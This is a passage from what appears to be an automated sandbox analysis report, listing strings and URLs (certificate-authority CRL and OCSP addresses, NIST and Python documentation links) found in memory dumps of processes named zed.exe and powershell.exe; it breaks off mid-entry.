Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3016784415.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024919479.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: zed.exe, 0000000C.00000003.3089378618.00000132F886F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3084201791.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082961123.00000132F8880000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577452-a-memoize-decorator-for-instance-methods/
Source: zed.exe, 0000000C.00000003.3084201791.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F895D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3087129020.00000132F88DD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082961123.00000132F88FC000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F8910000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://code.activestate.com/recipes/577916/
Source: zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl
Source: zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8976000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crlO
Source: powershell.exe, 0000000A.00000002.3075122060.000002B03D2E5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crlW
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3016784415.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024919479.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: zed.exe, 00000007.00000003.3023656011.0000019AE1696000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE1690000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/groups/ST/toolkit/BCM/documents/proposedmodes/eax/eax-spec.pdf
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8B41000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38C/SP800-38C.pdf
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738959618.00000132F8BA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38D/SP-800-38D.pdf
Source: zed.exe, 0000000C.00000002.4740870539.00000132F97BD000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740739040.00000132F9775000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4744481462.00000132F9EA8000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4738469312.00000132F8AD2000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4739872009.00000132F90F0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4744481462.00000132F9F34000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://csrc.nist.gov/publications/nistpubs/800-38a/sp800-38a.pdf
Source: zed.exe, 0000000C.00000002.4740017345.00000132F9540000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://curl.haxx.se/rfc/cookie_spec.html
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000003.3082680164.00000132F8910000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
Source: zed.exe, 0000000C.00000002.4739094462.00000132F8BE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://google.com/mail/
Source: zed.exe, 0000000C.00000002.4736620041.00000132F8A1E000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535
Source: powershell.exe, 00000000.00000002.4854162268.000001EE26D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: zed.exe, 0000000C.00000002.4736620041.00000132F89A0000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4744481462.00000132F9F34000.00000004.00001000.00020000.00000000.sdmp, zed.exe, 0000000C.00000002.4736620041.00000132F8852000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.186-4.pdf
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es
Source: zed.exe, 0000000C.00000002.4740170642.00000132F970A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
Source: zed.exe, 0000000C.00000002.4735156155.00000132F82E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.ests:
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022819061.0000019AE1690000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3021650374.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3015925774.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019498294.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3023684524.0000019AE169D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
Source: zed.exe, 00000006.00000003.2960141331.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E4F000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963925448.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957771612.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963414809.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963522909.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000002.4729822797.000002B961E77000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963644992.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2957624149.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963751700.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2962744638.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2961184557.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000006.00000003.2963235570.000002B961E54000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024138869.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3019558613.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3022791163.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3024889453.0000019AE1696000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026192491.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 00000007.00000003.3026506251.0000019AE169D000.00000004.00000020.00020000.00000000.sdmp, zed.exe, 